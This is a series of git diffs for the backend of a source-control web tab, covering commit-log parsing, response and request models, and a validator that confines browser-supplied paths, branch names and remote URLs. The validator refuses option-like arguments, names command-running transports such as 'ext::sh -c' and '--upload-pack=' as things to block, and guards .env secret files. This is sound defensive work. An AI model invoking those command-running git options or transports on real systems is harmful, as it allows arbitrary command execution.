+    # One more than the page, so that "is there another page" is answered by
+    # the read itself rather than by counting the history.
+    result = run_git(["log", "-z", f"--format={LOG_FORMAT}",
+                      f"--max-count={limit + 1}", f"--skip={skip}", "HEAD",
+                      "--"],
+                     cwd=root, timeout=T_READ, read_only=True)
+
+    rows = [row for row in result.out.split("\x00") if row]
+    has_more = len(rows) > limit
+    return LogResponse(
+        commits=[commit for commit in (_commit(row) for row in rows[:limit])
+                 if commit is not None],
+        has_more=has_more,
+        unborn=False)
+
+
+def _commit(row: str) -> CommitInfo | None:
+    """One record of the log format, or None if it is not one.
+
+    The split has a MAXIMUM: the body is the last field and may contain
+    anything, including the separator itself, and everything after the
+    eighth one is body.
+
+    A row with too few fields is dropped rather than raised on. This runs on
+    a history the user did not write, one row can be malformed for reasons
+    that are nobody's fault (a truncated pipe, a future git), and a page
+    missing one commit is a smaller failure than a history panel that shows
+    nothing.
+    """
+    parts = row.split(FIELD_SEP, LOG_FIELDS - 1)
+    if len(parts) < LOG_FIELDS:
+        return None
+    sha, short, parents, name, email, timestamp, refs, subject, body = parts
+    if not sha:
+        return None
+    return CommitInfo(
+        sha=sha,
+        short=short,
+        parents=parents.split(),
+        author_name=name,
+        author_email=email,
+        authored_at=_timestamp(timestamp),
+        refs=[ref.strip() for ref in refs.split(REF_SEP) if ref.strip()],
+        subject=subject,
+        # git ends %b with a newline and starts it after the blank line that
+        # follows the subject; the text between is the author's, indentation
+        # included.
+        body=body.strip("\n"))
+
+
+def _timestamp(text: str) -> int:
+    """``%at`` as an integer; 0 when it is not one.
+
+    A commit with an unreadable date is still a commit worth showing, and
+    the browser formats this field -- 0 is a date it can render.
+    """
+    try:
+        return int(text)
+    except ValueError:
+        return 0
+
+
+def commit_files(root: Path, sha: str) -> list[GitFile]:
+    """The files one commit changed, against its first parent.
+
+    A ROOT commit has no parent, so ``--root`` makes git diff it against the
+    empty tree -- every file in it is an addition, which is what it is. A
+    MERGE is diffed against its first parent explicitly; see the module
+    docstring for why git's own ``--first-parent`` cannot do that here.
+
+    ``xy`` on each file is the commit's letter followed by ``.`` -- the
+    porcelain v2 spelling for "changed in the tree, nothing in the working
+    copy" -- so the frontend can read a commit's file the same way it reads
+    a status entry.
+    """
+    commit = resolve_commit(root, sha)
+    parent = first_parent(root, commit)
+    trees = [parent, commit] if parent is not None else ["--root", commit]
+    result = run_git(["diff-tree", "-r", "-M", "-z", "--name-status",
+                      "--no-commit-id", *trees, "--"],
+                     cwd=root, timeout=T_READ, read_only=True)
+    return _name_status(result.stdout)
+
+
+def _name_status(data: bytes) -> list[GitFile]:
+    """Parse ``--name-status -z``: a status token, then one or two paths.
+
+    Each token is decoded on its own, like the status parser does and for
+    the same reason: under ``-z`` git prints a filename's bytes exactly as
+    the filesystem holds them, and one unreadable name must cost that name
+    a few replacement characters rather than cost the request.
+
+    A truncated record at the end is dropped: it is the tail of an output
+    that stopped, not evidence that what came before it is wrong.
+    """
+    tokens = [chunk.decode("utf-8", errors="replace")
+              for chunk in data.split(b"\x00")]
+    files: list[GitFile] = []
+    index = 0
+    while index < len(tokens):
+        status = tokens[index]
+        index += 1
+        if not status:
+            continue
+        letter = status[0]
+        renamed = letter in _TWO_PATH_LETTERS
+        needed = 2 if renamed else 1
+        if index + needed > len(tokens):
+            break
+        if renamed:
+            orig_path, path = tokens[index], tokens[index + 1]
+        else:
+            orig_path, path = None, tokens[index]
+        index += needed
+        if not path:
+            continue
+        kind: FileKind = kind_from_letter(letter)
+        files.append(GitFile(path=path, orig_path=orig_path, kind=kind,
+                             xy=f"{letter}.", score=_score(status)))
+    return files
+
+
+def _score(status: str) -> int | None:
+    """The similarity number in ``R100`` / ``C75``; None when there is none."""
+    digits = status[1:]
+    if not digits.isdigit():
+        return None
+    return int(digits)

--- a/backend/app/core/git/log.py
+++ b/backend/app/core/git/log.py
@@ -31,7 +31,7 @@ from pathlib import Path
 
 from .errors import GitError
 from .models import CommitInfo, FileKind, GitFile, LogResponse
-from .repo import first_parent, resolve_commit
+from .repo import commit_trees
 from .runner import T_READ, run_git
 from .status import kind_from_letter
 
@@ -58,7 +58,7 @@ FIELD_SEP = "\x1f"
 #:
 #: ``%x1f`` -- NOT ``%1f``, which git prints literally (measured on 2.53) --
 #: is a literal byte in git's pretty format.
-LOG_FORMAT = ("%H%x1f%h%x1f%P%x1f%an%x1f%ae%x1f%at%x1f%D%x1f%s%x1f%b")
+LOG_FORMAT = "%H%x1f%h%x1f%P%x1f%an%x1f%ae%x1f%at%x1f%D%x1f%s%x1f%b"
 
 #: How many fields the format above produces.
 LOG_FIELDS = 9
@@ -170,9 +170,7 @@ def commit_files(root: Path, sha: str) -> list[GitFile]:
     copy" -- so the frontend can read a commit's file the same way it reads
     a status entry.
     """
-    commit = resolve_commit(root, sha)
-    parent = first_parent(root, commit)
-    trees = [parent, commit] if parent is not None else ["--root", commit]
+    _, _, trees = commit_trees(root, sha)
     result = run_git(["diff-tree", "-r", "-M", "-z", "--name-status",
                       "--no-commit-id", *trees, "--"],
                      cwd=root, timeout=T_READ, read_only=True)

--- a/backend/app/core/git/log.py
+++ b/backend/app/core/git/log.py
@@ -35,9 +35,16 @@ from .repo import first_parent, resolve_commit
 from .runner import T_READ, run_git
 from .status import kind_from_letter
 
-#: The most commits one request may ask for. A page the tab draws is twenty
-#: or fifty; a hundred is the ceiling that keeps one request from being a
-#: whole history.
+#: How many commits one page holds unless the caller says otherwise, and
+#: the most it may hold. The cap is not about the server -- ``git log`` is
+#: cheap -- but about the tab: a page is a scroll position, and a client
+#: asking for ten thousand commits has a paging bug, not a big repository.
+#:
+#: Both live HERE and the route imports them, so there is one owner. They
+#: were two numbers once (a route that defaulted to 30 in front of a service
+#: that defaulted to 20), which is the kind of disagreement nothing fails
+#: over and everybody eventually trips on.
+DEFAULT_LOG_LIMIT = 30
 MAX_LOG_LIMIT = 100
 
 #: ASCII unit separator: the one character a commit message is least likely
@@ -63,7 +70,8 @@ REF_SEP = ", "
 _TWO_PATH_LETTERS = ("R", "C")
 
 
-def log(root: Path, *, skip: int = 0, limit: int = 20) -> LogResponse:
+def log(root: Path, *, skip: int = 0,
+        limit: int = DEFAULT_LOG_LIMIT) -> LogResponse:
     """One page of *root*'s history, newest first.
 
     *skip* and *limit* are the page; the routes clamp them, and they are

--- a/backend/app/core/git/models.py
+++ b/backend/app/core/git/models.py
@@ -235,10 +235,21 @@ class DiffResponse(BaseModel):
 
 
 class FileAtRef(BaseModel):
-    """``GET /api/git/file``: one file's content at one ref."""
+    """``GET /api/git/file``: one file's content at one ref.
 
-    #: Empty for a binary file -- and for an empty one, which is why
-    #: ``binary`` is a field of its own rather than something to infer.
+    ``truncated`` does not promise a prefix. A file read from DISK is cut
+    at the cap and ``text`` holds what came before the cut; a file read out
+    of the object database is not read at all once its size is known to be
+    over it, and ``text`` is then empty beside a real ``size``. The tab
+    draws the same "too big to show" panel for both, and the alternative
+    -- streaming a megabyte nobody will look at, or buffering a 200 MB blob
+    to throw most of it away -- costs the server more than the answer is
+    worth.
+    """
+
+    #: Empty for a binary file, for an empty one, and for a file past the
+    #: cap that was never read -- which is why ``binary`` and ``truncated``
+    #: are fields of their own rather than something to infer.
     text: str
     #: A NUL in the first bytes: the tab shows a placeholder, not mojibake.
     binary: bool = False

--- a/backend/app/core/git/models.py
+++ b/backend/app/core/git/models.py
@@ -267,14 +267,15 @@ class MutationResult(BaseModel):
 
     Every mutation answers with a fresh ``status``, so the tab never has to
     ask twice and can never draw a stale panel after a stage or a commit.
-    ``status`` is required and nullable rather than optional: a mutation
-    that succeeded and then could not be read back is a real (if rare)
-    outcome, and reporting it as a failure would be a lie about what
-    happened to the repository -- so the service has to make that call
-    explicitly instead of leaving the field out.
+    Required and NOT nullable, because that is the contract: the frontend is
+    typed from this file, and a nullable field here would ship it a branch
+    it has to handle and the service is required never to produce. A write
+    that succeeds and then cannot be read back is a FAILED request -- an
+    error with a code, which the tab already knows what to do with -- not a
+    result with a hole in it.
     """
 
-    status: GitStatus | None
+    status: GitStatus
     #: Paths whose state this operation changed, for the tab to highlight or
     #: to reload in an open editor.
     changed_paths: list[str] = Field(default_factory=list)

--- a/backend/app/core/git/models.py
+++ b/backend/app/core/git/models.py
@@ -12,15 +12,14 @@ model:
 * **Responses default to the empty answer; requests do not.** Every field of
   a response that can be absent has the default that means "git did not
   say" -- None, ``False``, ``0``, an empty list -- so a producer never has to
-  spell out an absence, and ``GitStatus()`` is exactly the status of a clean
-  repository. What a response exists to CARRY stays required (a patch, a
+  spell out an absence, and an unfilled ``GitStatus()`` claims nothing about
+  the repository. What a response exists to CARRY stays required (a patch, a
   file's text and size, a commit's sha), so it cannot be left out by
-  accident. Requests are the opposite again: they carry ``extra="forbid"``,
-  so a body with a key nobody defined is a 422 rather than a silently
-  ignored instruction.
-  That is the same reasoning ``routes_packs.InstallRequest`` gives -- the
-  schema, not the handler, is what makes "the client cannot smuggle in an
-  argument" a guarantee.
+  accident. Requests are the opposite: they carry ``extra="forbid"``, so a
+  body with a key nobody defined is a 422 rather than a silently ignored
+  instruction -- the same reasoning ``routes_packs.InstallRequest`` gives,
+  where the schema rather than the handler is what makes "the client cannot
+  smuggle in an argument" a guarantee.
 * **``kind`` and ``xy`` are both kept, and they are not redundant.** ``kind``
   is the summary the UI draws an icon from; ``xy`` is git's own two letters,
   which say strictly more. ``DU`` and ``UU`` are both ``kind="conflict"``
@@ -112,9 +111,10 @@ class GitFile(BaseModel):
 class GitStatus(BaseModel):
     """Everything one ``git status --porcelain=v2 --branch`` call said.
 
-    Constructed with no arguments this is the status of a clean repository
-    on an unborn branch, which is the honest default: every field means
-    "git did not mention it".
+    Constructed with no arguments, every field means "git did not mention
+    it": no branch, no commit, nothing changed. That is the honest default
+    rather than a pretend one -- a status object nobody filled in claims
+    nothing about the repository.
     """
 
     #: The current branch, or ``None`` when HEAD is detached.

--- a/backend/app/core/git/models.py
+++ b/backend/app/core/git/models.py
@@ -1,0 +1,354 @@
+"""The shapes the Source Control tab sends and receives.
+
+One module for the whole vocabulary, because these types ARE the contract
+between the backend and the tab: the parser fills them, the service returns
+them, the routes serialise them, and the frontend's TypeScript is written
+from this file. A field added in a route handler instead of here is a field
+the frontend never learns about.
+
+Three decisions are worth stating once, here, rather than re-deciding per
+model:
+
+* **Responses default to the empty answer; requests do not.** Every field of
+  a response that can be absent has the default that means "git did not
+  say" -- None, ``False``, ``0``, an empty list -- so a producer never has to
+  spell out an absence, and ``GitStatus()`` is exactly the status of a clean
+  repository. What a response exists to CARRY stays required (a patch, a
+  file's text and size, a commit's sha), so it cannot be left out by
+  accident. Requests are the opposite again: they carry ``extra="forbid"``,
+  so a body with a key nobody defined is a 422 rather than a silently
+  ignored instruction.
+  That is the same reasoning ``routes_packs.InstallRequest`` gives -- the
+  schema, not the handler, is what makes "the client cannot smuggle in an
+  argument" a guarantee.
+* **``kind`` and ``xy`` are both kept, and they are not redundant.** ``kind``
+  is the summary the UI draws an icon from; ``xy`` is git's own two letters,
+  which say strictly more. ``DU`` and ``UU`` are both ``kind="conflict"``
+  and they want different buttons ("keep ours" means "keep it deleted" in
+  one of them), and ``MM`` is one file that is in the staged list AND the
+  unstaged list. Throwing the letters away here would mean re-running git to
+  get them back.
+* **``FileKind`` is closed.** The frontend switches on it; a kind it has
+  never heard of renders as nothing at all. So the parser maps anything
+  unexpected onto a member of this set rather than inventing one -- see
+  ``status.kind_from_letter``.
+
+Requests validate SHAPE only. Whether a path escapes the repository, whether
+a message is too long, whether an email looks like an email -- that is
+``paths.py``'s job, and it belongs there because those failures have to come
+back as a :class:`~app.core.git.errors.GitError` with a code the frontend
+translates, not as pydantic's English prose in a 422.
+
+G3 adds ``BranchInfo`` / ``RemoteInfo`` / ``StashInfo`` and the requests for
+branches, remotes and stashes; this file is the G1 subset.
+
+No subprocess and no runner import: the parser and the tests can build a
+status without a git on PATH.
+"""
+
+from __future__ import annotations
+
+from typing import Any, Literal
+
+from pydantic import BaseModel, ConfigDict, Field, model_validator
+
+#: What happened to one file, as the tab draws it.
+#:
+#: ``untracked`` and ``conflict`` are not git status letters -- they are the
+#: RECORD types ``?`` and ``u`` -- but they belong in the same set because
+#: the UI asks one question of a file ("what icon, what actions") and wants
+#: one answer.
+FileKind = Literal[
+    "modified",
+    "added",
+    "deleted",
+    "renamed",
+    "copied",
+    "typechange",
+    "untracked",
+    "conflict",
+]
+
+#: Where git read a config value from. ``None`` means the value is unset.
+ConfigScope = Literal["local", "global", "system"]
+
+#: How far ``repo_info()`` got. Resolved in this order, first hit wins:
+#: no project directory is open, git is not installed, git is too old for
+#: ``restore``/``switch``, the project directory is not the top level of a
+#: repository, everything works.
+RepoState = Literal[
+    "no_project",
+    "git_missing",
+    "git_too_old",
+    "not_repo",
+    "ready",
+]
+
+
+class GitFile(BaseModel):
+    """One file in one of the four status groups.
+
+    The same path can appear twice in one status -- ``MM`` is staged AND
+    unstaged -- and those are two entries with the same ``xy`` and different
+    ``kind``. That is deliberate: it is what VS Code shows, and it is the
+    only way to offer "unstage" and "discard" on the same file at once.
+    """
+
+    #: Repository-relative, POSIX separators, never quoted (git runs with
+    #: ``core.quotepath=false`` and ``-z``, so a CJK name arrives as itself).
+    path: str
+    #: Where a rename or copy came from; ``None`` for every other kind.
+    orig_path: str | None = None
+    kind: FileKind
+    #: git's two status letters, exactly as porcelain v2 printed them
+    #: (``MM``, ``.M``, ``A.``, ``UU``, ``DU``). Untracked entries have no
+    #: letters in porcelain v2 and get the ``??`` of porcelain v1, so that
+    #: every entry the frontend sees has two characters here.
+    xy: str
+    #: Similarity percentage of a rename or copy (git's ``R100`` / ``C75``).
+    score: int | None = None
+
+
+class GitStatus(BaseModel):
+    """Everything one ``git status --porcelain=v2 --branch`` call said.
+
+    Constructed with no arguments this is the status of a clean repository
+    on an unborn branch, which is the honest default: every field means
+    "git did not mention it".
+    """
+
+    #: The current branch, or ``None`` when HEAD is detached.
+    branch: str | None = None
+    detached: bool = False
+    #: The commit HEAD points at; ``None`` on an unborn branch.
+    head: str | None = None
+    #: No commit yet (git prints ``# branch.oid (initial)``).
+    unborn: bool = False
+    #: The upstream branch as git names it (``origin/main``), if configured.
+    upstream: str | None = None
+    #: Commits this branch has that the upstream does not, and the reverse.
+    #: Both are ``None`` when there is no upstream -- or when there is one
+    #: and it no longer exists, which is what ``upstream_gone`` is for.
+    ahead: int | None = None
+    behind: int | None = None
+    #: An upstream is configured but its ref is gone (the remote branch was
+    #: deleted and pruned). git then prints ``# branch.upstream`` with no
+    #: ``# branch.ab``, so "configured but uncounted" is the whole signal
+    #: porcelain v2 gives.
+    upstream_gone: bool = False
+    staged: list[GitFile] = Field(default_factory=list)
+    unstaged: list[GitFile] = Field(default_factory=list)
+    untracked: list[GitFile] = Field(default_factory=list)
+    conflicted: list[GitFile] = Field(default_factory=list)
+    #: Entries on the stash stack (``# stash N``; absent means none).
+    stash_count: int = 0
+    #: Set by the SERVICE, not the parser: porcelain v2 says nothing about
+    #: them, and the answer is whether ``MERGE_HEAD`` / ``rebase-merge`` /
+    #: ``rebase-apply`` exist under the git directory.
+    merge_in_progress: bool = False
+    rebase_in_progress: bool = False
+
+
+class RepoInfo(BaseModel):
+    """Whether the tab can talk to a repository at all, and why not.
+
+    Always answered, even when the answer is "no": ``GET /api/git/status``
+    is a 200 with ``status=None`` rather than an error, because "there is no
+    project open" is a screen the tab draws, not a failure it reports.
+    """
+
+    state: RepoState
+    #: The open project directory, as an absolute path string.
+    project_dir: str | None = None
+    #: ``git --version``'s answer, when there is a git to ask.
+    git_version: str | None = None
+    #: Set when the project directory sits INSIDE some other repository (the
+    #: CodefyUI checkout, or a home directory somebody ran ``git init`` in).
+    #: The tab must never operate on that repository, so the path is
+    #: reported and the state stays ``not_repo``.
+    nested_toplevel: str | None = None
+
+
+class StatusResponse(BaseModel):
+    """``GET /api/git/status``: the repository, and the status if there is one."""
+
+    repo: RepoInfo
+    status: GitStatus | None = None
+
+
+class CommitInfo(BaseModel):
+    """One row of the history."""
+
+    sha: str
+    short: str
+    #: Parent shas; empty for the root commit, two or more for a merge.
+    parents: list[str] = Field(default_factory=list)
+    author_name: str
+    author_email: str
+    #: Author date as a unix timestamp (git's ``%at``). A number, not a
+    #: string: the browser formats it in the user's own locale and timezone,
+    #: which a server-side format would get wrong for everybody else.
+    authored_at: int
+    #: Ref names pointing here (``HEAD -> main``, ``origin/main``, tags).
+    refs: list[str] = Field(default_factory=list)
+    subject: str
+    body: str = ""
+
+
+class LogResponse(BaseModel):
+    """``GET /api/git/log``: one page of history.
+
+    ``has_more`` comes from asking git for one commit more than the page
+    size and dropping it, which is cheaper and steadier than counting the
+    whole history to paginate against.
+    """
+
+    commits: list[CommitInfo] = Field(default_factory=list)
+    has_more: bool = False
+    #: No commits exist yet, so an empty page is the complete answer.
+    unborn: bool = False
+
+
+class DiffResponse(BaseModel):
+    """``GET /api/git/diff``: a patch, and optionally both sides in full.
+
+    The patch is what the tab renders by default. ``old_text`` / ``new_text``
+    are filled only when the caller asks for the blobs (a side-by-side view
+    needs the whole file, not the hunks), and stay ``None`` otherwise rather
+    than shipping two copies of every file on every request.
+    """
+
+    patch: str
+    #: git said "Binary files ... differ": there is no text to show.
+    binary: bool = False
+    #: The patch hit the size cap and was cut.
+    truncated: bool = False
+    #: What was compared, in the tab's own words (``HEAD``, ``index``,
+    #: ``worktree``, a sha) -- for the header above the diff.
+    old_ref: str | None = None
+    new_ref: str | None = None
+    old_text: str | None = None
+    new_text: str | None = None
+    #: The file does not exist on that side (added, or deleted).
+    old_missing: bool = False
+    new_missing: bool = False
+
+
+class FileAtRef(BaseModel):
+    """``GET /api/git/file``: one file's content at one ref."""
+
+    #: Empty for a binary file -- and for an empty one, which is why
+    #: ``binary`` is a field of its own rather than something to infer.
+    text: str
+    #: A NUL in the first bytes: the tab shows a placeholder, not mojibake.
+    binary: bool = False
+    #: Size in bytes of what git had, BEFORE any truncation. Required, so a
+    #: binary file still reports how big it is.
+    size: int
+    truncated: bool = False
+
+
+class Identity(BaseModel):
+    """Who commits, and where that was configured.
+
+    The scope is shown because it is the difference between "this changes
+    one repository" and "this changes every repository on the machine", and
+    the tab only ever WRITES ``local``.
+    """
+
+    name: str | None = None
+    email: str | None = None
+    name_scope: ConfigScope | None = None
+    email_scope: ConfigScope | None = None
+
+
+class MutationResult(BaseModel):
+    """What one write left behind.
+
+    Every mutation answers with a fresh ``status``, so the tab never has to
+    ask twice and can never draw a stale panel after a stage or a commit.
+    ``status`` is required and nullable rather than optional: a mutation
+    that succeeded and then could not be read back is a real (if rare)
+    outcome, and reporting it as a failure would be a lie about what
+    happened to the repository -- so the service has to make that call
+    explicitly instead of leaving the field out.
+    """
+
+    status: GitStatus | None
+    #: Paths whose state this operation changed, for the tab to highlight or
+    #: to reload in an open editor.
+    changed_paths: list[str] = Field(default_factory=list)
+    #: HEAD after the operation, when there is one.
+    head: str | None = None
+    #: Operation-specific extras (which remote was pushed to, how many files
+    #: a discard touched). Deliberately open: it is display sugar, and a
+    #: closed model per operation would be a dozen models for one line of UI.
+    detail: dict[str, Any] = Field(default_factory=dict)
+
+
+class PathsRequest(BaseModel):
+    """The body of stage / unstage / discard: some paths, or everything.
+
+    Exactly one of the two forms, and that is enforced here rather than in
+    three handlers. ``git add -A --`` with an empty pathspec stages the WHOLE
+    tree, so "nothing was selected" arriving as ``paths=[]`` must never be
+    able to turn into "all" further down; and a body carrying both is a
+    client bug that would otherwise be resolved by whichever branch the
+    handler happened to test first.
+    """
+
+    model_config = ConfigDict(extra="forbid")
+
+    paths: list[str] | None = None
+    #: Shadows the builtin, and stays: it is the wire name the frontend
+    #: sends, and renaming it would put a mapping in every handler.
+    all: bool = False
+
+    @model_validator(mode="after")
+    def _exactly_one_form(self) -> PathsRequest:
+        """Refuse both, neither, and the empty list."""
+        named = self.paths is not None
+        if named and self.all:
+            raise ValueError(
+                "send either paths or all=true, not both")
+        if not named and not self.all:
+            raise ValueError(
+                "send either paths (a non-empty list) or all=true")
+        if named and not self.paths:
+            raise ValueError(
+                "paths must name at least one file; use all=true for "
+                "the whole tree")
+        return self
+
+
+class CommitRequest(BaseModel):
+    """The body of commit.
+
+    ``message`` is a plain ``str`` on purpose: its length and content are
+    checked by ``paths.validate_commit_message``, so an over-long message
+    comes back as a 400 with the code ``invalid_value`` like every other
+    refused value, instead of a 422 full of pydantic's English.
+    """
+
+    model_config = ConfigDict(extra="forbid")
+
+    message: str
+    #: Stage everything first (VS Code's "Commit All").
+    all: bool = False
+    #: Replace the previous commit instead of adding one. The UI hides this
+    #: when the commit has already been pushed.
+    amend: bool = False
+
+
+class IdentityRequest(BaseModel):
+    """The body of the identity write: either field, or both.
+
+    Both may be omitted -- that is a request that changes nothing, which is
+    a no-op rather than an error; the values themselves are checked by
+    ``paths.validate_identity``.
+    """
+
+    model_config = ConfigDict(extra="forbid")
+
+    name: str | None = None
+    email: str | None = None

--- a/backend/app/core/git/paths.py
+++ b/backend/app/core/git/paths.py
@@ -153,11 +153,33 @@ def validate_rel_path(root: Path, path: str) -> str:
     if normalised.startswith("-"):
         _refuse("invalid_path", "a path may not start with '-'")
 
-    root_resolved = Path(os.path.normcase(str(root.resolve())))
-    resolved = Path(os.path.normcase(str((root / normalised).resolve())))
+    root_resolved = _resolved(root, normalised)
+    resolved = _resolved(root / normalised, normalised)
     if resolved == root_resolved or not resolved.is_relative_to(root_resolved):
         _refuse("invalid_path", "a path must stay inside the project")
     return normalised
+
+
+def _resolved(target: Path, path: str) -> Path:
+    """``target.resolve()``, case-folded -- or a 400 when it cannot be.
+
+    ``Path.resolve`` is not string arithmetic: it walks the filesystem, and
+    it can fail. On Python 3.11 -- the runtime this ships on -- a SYMLINK
+    CYCLE (``a -> b -> a``) raises ``RuntimeError("Symlink loop")`` instead
+    of giving up quietly, which 3.13 does; an ``OSError`` is the same kind
+    of answer for a different reason (a name the filesystem will not
+    answer for, a device that is not there).
+
+    Either way the containment check cannot be made, and a path whose real
+    location cannot be established is one this API refuses. Unhandled, that
+    was an unexpected exception -- a 500 on an open GET, from a link
+    anybody with write access to the project can create.
+    """
+    try:
+        return Path(os.path.normcase(str(target.resolve())))
+    except (OSError, RuntimeError):
+        _refuse("invalid_path", f"{path} could not be resolved",
+                hint="the path could not be resolved")
 
 
 def validate_rel_paths(root: Path, paths: Sequence[str]) -> list[str]:

--- a/backend/app/core/git/paths.py
+++ b/backend/app/core/git/paths.py
@@ -310,7 +310,7 @@ def validate_sha(sha: str) -> str:
     return text
 
 
-def is_env_secret_path(path: str) -> bool:
+def is_env_secret_path(path: str | os.PathLike[str]) -> bool:
     """Is *path* a dotenv file -- i.e. a file that probably holds secrets?
 
     ``.env`` and ``.env.<anything>`` are, ``.env.example`` is not (it exists

--- a/backend/app/core/git/paths.py
+++ b/backend/app/core/git/paths.py
@@ -20,7 +20,9 @@ Three of them are about more than syntax:
   repository pointing out of it. Backslashes are refused outright rather
   than translated: the frontend sends POSIX paths because git speaks POSIX
   paths, and accepting ``a\b`` would mean guessing whether that is a
-  Windows separator or a filename a Linux user is entitled to create.
+  Windows separator or a filename a Linux user is entitled to create. A
+  colon is refused anywhere, for the reason a drive letter is: on Windows it
+  opens an alternate data stream instead of the file it appears to name.
 * **an empty path list is refused**, because ``git add -A --`` with no
   pathspec stages the WHOLE tree. "Nothing selected" must never be able to
   arrive as "everything".
@@ -130,6 +132,14 @@ def validate_rel_path(root: Path, path: str) -> str:
         _refuse("invalid_path", "a path must use / as its separator")
     if path.startswith("/") or _DRIVE_RE.match(path):
         _refuse("invalid_path", "a path must be relative to the project")
+    # ANY colon, not only a drive letter. On Windows ``ab:c.txt`` names the
+    # ALTERNATE DATA STREAM ``c.txt`` of the file ``ab`` -- a second, hidden
+    # fork of a file, which is not the file it appears to name and is not
+    # what a diff of ``ab:c.txt`` would show. git cannot check such a name
+    # out on Windows either, so no path git ever prints in a status contains
+    # one, and a request naming it is asking for something else.
+    if ":" in path:
+        _refuse("invalid_path", "a path may not contain ':'")
 
     pure = PurePosixPath(path)
     if ".." in pure.parts:

--- a/backend/app/core/git/paths.py
+++ b/backend/app/core/git/paths.py
@@ -1,0 +1,327 @@
+"""Closed grammars for everything the browser is allowed to name.
+
+The Source Control tab sends paths, branch names, remote names, URLs and
+messages, and every one of them ends up on a git command line. git's command
+line has no quoting problem to exploit -- there is no shell here -- but it
+has something subtler: an argument that begins with ``-`` is an OPTION, and
+several git options do more than they look like. ``--upload-pack=`` runs a
+command on a fetch. So the rule these functions enforce is not "escape it",
+it is "it has to look like the thing it claims to be, or it does not go".
+
+Closed grammars, not blocklists: each validator says what IS allowed and
+refuses the rest. A blocklist of dangerous prefixes has to be updated every
+time git grows an option; ``^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$`` does not.
+
+Three of them are about more than syntax:
+
+* **paths are confined to the repository.** ``..`` and an absolute path are
+  refused by shape, and then the resolved path is checked against the
+  resolved root -- which is the check that also catches a symlink inside the
+  repository pointing out of it. Backslashes are refused outright rather
+  than translated: the frontend sends POSIX paths because git speaks POSIX
+  paths, and accepting ``a\b`` would mean guessing whether that is a
+  Windows separator or a filename a Linux user is entitled to create.
+* **an empty path list is refused**, because ``git add -A --`` with no
+  pathspec stages the WHOLE tree. "Nothing selected" must never be able to
+  arrive as "everything".
+* **``.env`` is not a path like the others.** :func:`is_env_secret_path`
+  exists so the file and diff reads -- which are open GETs -- can refuse it
+  at any ref: a secret that was committed once stays in history, and
+  ``.gitignore`` does not un-commit it.
+
+Deliberately subprocess-free. Branch names get a regex pre-check here and
+the real ``git check-ref-format`` in the service, so this module stays
+importable, instant and testable without a git on PATH.
+"""
+
+from __future__ import annotations
+
+import os
+import re
+from collections.abc import Sequence
+from pathlib import Path, PurePosixPath
+from typing import NoReturn
+
+from .errors import GitError
+
+#: How many paths one request may name. A stage-all of a big working tree
+#: goes through the ``.`` form instead, so this is a cap on an explicit
+#: SELECTION -- past a few hundred, the user meant "all".
+MAX_PATHS = 500
+
+#: A commit message long enough for anything (git itself has no limit), and
+#: short enough that it cannot be used to fill a disk one commit at a time.
+MAX_COMMIT_MESSAGE = 10_000
+
+#: A stash message is one line in ``git stash list``.
+MAX_STASH_MESSAGE = 500
+
+#: Names on both sides of ``Author: <name> <email>``.
+MAX_IDENTITY = 255
+
+#: Refs and URLs. Both are far past anything real -- a filesystem gives up
+#: on a ref name well before 255 -- and exist so a validator cannot be
+#: handed a megabyte to match against.
+MAX_BRANCH_NAME = 255
+MAX_REMOTE_URL = 2048
+
+#: A branch name, pre-check only: no leading whitespace / ``@`` / ``-``, and
+#: no whitespace or control character anywhere. ``git check-ref-format``
+#: (the service) is the authority on the rest -- trailing ``.lock``, ``..``,
+#: ``~``, ``^``, ``:`` -- and this exists so an obviously wrong name is a
+#: 400 with a reason rather than a subprocess. Exported because Task 3's
+#: service and its tests need the same rule.
+BRANCH_NAME_RE = re.compile(r"^[^\s@-][^\s\x00-\x1f]*$")
+
+#: A remote name. git allows more than this; the tab does not need it.
+REMOTE_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")
+
+#: ``git@github.com:owner/repo.git`` -- the scp-like form, which has no
+#: scheme and so has to be recognised by shape.
+SCP_URL_RE = re.compile(r"^[A-Za-z0-9._-]+@[A-Za-z0-9.-]+:[^\s]+$")
+
+#: The schemes ``GIT_ALLOW_PROTOCOL`` lets through, spelled out again here
+#: so a bad URL is a 400 with an explanation rather than a git failure.
+ALLOWED_URL_SCHEMES = ("https://", "ssh://", "file://")
+
+#: Transport helpers whose "URL" is a command line git will run
+#: (``ext::sh -c ...``). Refused by name as well as by the scheme
+#: allowlist above, because this one is worth failing loudly.
+REFUSED_URL_SCHEMES = ("ext::", "fd::")
+
+#: A full or abbreviated commit id. Verified for real with
+#: ``rev-parse --verify`` in the service; this is the shape check.
+SHA_RE = re.compile(r"^[0-9a-f]{7,40}$")
+
+#: A drive letter, i.e. an absolute Windows path in disguise: ``C:/secrets``
+#: is not relative to anything.
+_DRIVE_RE = re.compile(r"^[A-Za-z]:")
+
+#: C0 controls and DEL. NUL is the separator git's ``-z`` output uses, and
+#: the rest have no business in a name that will be parsed back out of it.
+_CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")
+
+_WHITESPACE_RE = re.compile(r"\s")
+
+
+def _refuse(code: str, message: str, hint: str | None = None) -> NoReturn:
+    """Refuse a value: always a 400, always with a code the frontend knows."""
+    raise GitError(code, 400, message, hint=hint)
+
+
+def validate_rel_path(root: Path, path: str) -> str:
+    """Check *path* is a plain relative path inside *root*; return it normalised.
+
+    The returned string is POSIX, without ``./`` segments, doubled slashes
+    or a trailing slash -- so two spellings of the same file cannot be two
+    entries in a request, and what goes on the command line is what the
+    status output would have called it.
+
+    The containment check resolves both sides, which is what makes it hold
+    for a symlink as well as for ``..``: a link inside the repository that
+    points outside it resolves outside the root and is refused here rather
+    than serving whatever it points at.
+    """
+    if not path:
+        _refuse("invalid_path", "a path is required")
+    if _CONTROL_RE.search(path):
+        _refuse("invalid_path", "a path may not contain control characters")
+    if "\\" in path:
+        _refuse("invalid_path", "a path must use / as its separator")
+    if path.startswith("/") or _DRIVE_RE.match(path):
+        _refuse("invalid_path", "a path must be relative to the project")
+
+    pure = PurePosixPath(path)
+    if ".." in pure.parts:
+        _refuse("invalid_path", "a path may not contain '..'")
+    if not pure.parts:
+        _refuse("invalid_path", "a path is required")
+
+    normalised = pure.as_posix()
+    # After normalisation, so that "./-rf" is refused for the same reason
+    # "-rf" is: git would read it as an option, not a file.
+    if normalised.startswith("-"):
+        _refuse("invalid_path", "a path may not start with '-'")
+
